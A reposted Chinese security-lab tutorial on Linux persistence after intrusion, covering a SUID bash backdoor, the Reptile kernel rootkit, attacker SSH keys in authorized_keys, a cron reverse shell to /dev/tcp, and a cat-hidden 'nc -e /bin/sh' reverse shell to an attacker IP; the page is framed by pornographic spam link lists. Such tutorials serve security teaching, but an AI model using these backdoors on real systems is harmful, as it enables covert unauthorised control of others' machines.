日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 运维知识 > linux >内容正文

linux

linux实验总结及心得_安全实验室 | 内网渗透—Linux权限维持技巧总结

發布時間:2024/7/19 linux 28 豆豆
生活随笔 收集整理的這篇文章主要介紹了 linux实验总结及心得_安全实验室 | 内网渗透—Linux权限维持技巧总结 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

在上一篇文章中我們介紹了內網滲透中Windows環境下進行權限維持(點擊閱讀)的方式,本期我們將視角集中在Linux系統中繼續對內網滲透中的權限維持方式進行探索。Linux也是在內網滲透中很常見的操作系統,但是其內部實現方式卻與Windows有著本質的區別。我們在對Windows權限維持方式的基礎上總結Linux系統的權限維持方式。

01SUID后門

SUID是Set uid的簡稱,當一個文件的所屬主的標識位是x,且所屬主為root時,當執行該文件時,是以root身份執行的。所以如果攻擊者創建一個滿足上述條件的文件,并且使用該文件反彈一個bash的話,就會使一個普通用戶得到一個root權限的shell。

創建文件時必須具備以下條件:

  • SUID權限只對二進制程序有效;

  • 執行者對于該程序需要具有x的可執行權限;

  • 本權限僅在執行該程序的過程中有效;

  • 在執行過程中執行者將具有該程序擁有者的權限;

首先使用root權限創建一個suid權限的隱藏文件,這個文件是/bin/bash的復制文件。

其次,使用普通用戶登入系統,使用如下命令/var/.hack -p,執行該文件以獲得一個root shell,執行后可以看到權限已經變成了root權限。

02Linux內核Rootkit后門

?????
內核級Linux Rootkit的隱藏性通常要借助對Linux系統調用的截獲來達到目的,并且難以查殺、難以清除,危害巨大。主要適用的目標版本如下:

  • Debian 9:4.9.0-8-amd64

  • Debian 10:4.19.0-8-amd64

  • Ubuntu 18.04.1 LTS:4.15.0-38-generic

  • Kali Linux:4.18.0-kali2-amd64

  • Centos 6.10:2.6.32- 754.6.3.el6.x86_64

  • Centos 7:3.10.0-862.3.2.el7.x86_64

  • Centos 8:4.18.0-147.5.1.el8_1.x86_64

項目地址為:

https://github.com/f0rb1dd3n/Reptile

03SSH后門

SSH是Linux提供的一種遠程登陸服務,SSH總共提供了兩種登陸驗證方式:一是賬號密碼登錄,也是常用的登陸方式;二是公私鑰登錄,SSH允許驗證登錄者提供的私鑰與自身公鑰是否匹配,以確定是否允許該用戶登錄。具體驗證方式如下:


首先攻擊者在本地生成一份SSH登錄的公私鑰對,使用如下命令即可:

ssh-keygen -trsa。


使用ssh-keygen生成兩份文件,分別是id_rsa和id_rsa.pub前者是私鑰文件,后者是公鑰文件。使用某種方法,將攻擊者生成的公鑰文件id_rsa.pub上傳進目標機~/.ssh/authorized_keys目錄下即可。


使用ssh直接登錄目標機即可,無需賬號密碼。

04計劃任務后門

與Windows一樣,Linux也提供了計劃任務程序,在Linux系統中計劃任務一般是由cron承擔。我們使用cron添加一個反彈shell的計劃任務,以實現權限維持。

首先檢查目標機是否開啟了計劃任務。

利用cron程序寫入一個計劃任務:’*/1 * * * * bash -I>& /dev/tcp// 0>&1’使其每一分鐘向攻擊者IP發彈一次shell。


在攻擊機上監聽相應的端口,過了一分鐘即可接收到來自目標機的反彈shell,實現權限維持。

05Cat命令缺陷后門

Cat命令是Linux系統自帶的指令,能夠查看文件的具體內容。但是Cat指令卻存在缺陷,cat默認是支持一些如\r回車符\n換行符\f換頁符等特殊符號,這些符號可能導致一些內容被錯誤的解析,進而隱藏一些系統命令。

創建一個python文件,使其能夠生成一個包含特殊符號的.sh文件,這個文件可以將惡意指令進行隱藏。


使用普通的cat指令查看這個.sh文件,發現惡意指令被隱藏。重新使用cat指令帶上-A參數即可看到該文件的真實全部內容。可以查看到惡意指令:nc -e /bin/sh 192.168.210.37 9999。

如果管理員沒有仔細查看文件的具體內容就執行了該文件,攻擊機則可以接到一個來自目標機的反彈shell。

總結

以上是生活随笔為你收集整理的linux实验总结及心得_安全实验室 | 内网渗透—Linux权限维持技巧总结的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。

主站蜘蛛池模板: 久久久久久久久久久久久女国产乱 | 黄色在线资源 | 日韩不卡视频在线观看 | 丝袜视频在线观看 | 西西人体44www大胆无码 | 精品国产精品网麻豆系列 | 精品三区 | 在线观看视频91 | 黄色大片网址 | 亚洲高清免费视频 | 91精品久久人妻一区二区夜夜夜 | 国产一区二区小说 | 欧美一及片 | 欧美黑人欧美精品刺激 | 久久久天堂| 综合成人 | 荫道bbwbbb高潮潮喷 | 人操人视频| 台湾一级视频 | 特大黑人娇小亚洲女mp4 | 久久久极品 | 色女孩综合网 | 中文字幕精品一二三四五六七八 | 久热色| 亚洲午夜精品久久久久久app | 欧美做爰全过程免费看 | 中文字幕免费看 | 国产婷婷一区二区三区久久 | aaa久久| 亚洲久久久久 | 日韩三区四区 | 久久中文视频 | 黄视频免费在线看 | 亚洲成人av免费观看 | 午夜在线精品 | 国产日韩二区 | 国产成人精 | 日韩毛片网站 | 三级视频久久 | 鲁片一区二区三区 | 日本二三区 | a级一a一级在线观看 | 黄网址在线 | 免费在线国产视频 | 国产精品久久久无码一区 | aaaaaabbbbbb毛片 | 中文字幕在线观看高清 | 免费国偷自产拍精品视频 | 中文字幕有码在线播放 | 亚洲av成人一区二区国产精品 | 成人av一区二区三区 | 国产人妖av | 麻豆av导航 | 欧州一区| 69成人免费视频 | 亚洲国产黄色av | 古典武侠av | 三级男人添奶爽爽爽视频 | 久久久精品中文字幕 | bangbros性欧美18 | 四虎国产在线 | 国产成人精品一区二区三区免费 | av资源首页 | 性大片潘金莲裸体 | 可以免费看污视频的网站 | 久草影视在线观看 | 色噜噜在线| 东京热一本视频一区 | 亚洲男人天堂网 | 亚洲卡一卡二卡三 | 超碰在线9 | 高清国产一区二区三区四区五区 | 国产视频三区 | 67194少妇在线观看 | 国产伦理一区 | 国产另类av| 久久久99国产精品免费 | 欧亚av | 亚洲成人第一网站 | www.日本在线观看 | 精品久| 国产乱码在线观看 | 亚洲欧美日韩成人在线 | 伊人成人在线观看 | 噜噜噜噜私人影院 | 福利视频亚洲 | 国产高清视频 | 黑森林av导航 | 亚洲经典视频在线观看 | av三级 | 老师的肉丝玉足夹茎 | 亚洲综合区 | 精品一区二三区 | 电影桑叶2在线播放完整版 222aaa | 色999日韩 | 日韩午夜影院 | xxxx日本黄色| 日韩在线不卡一区 | 国产又粗又猛 |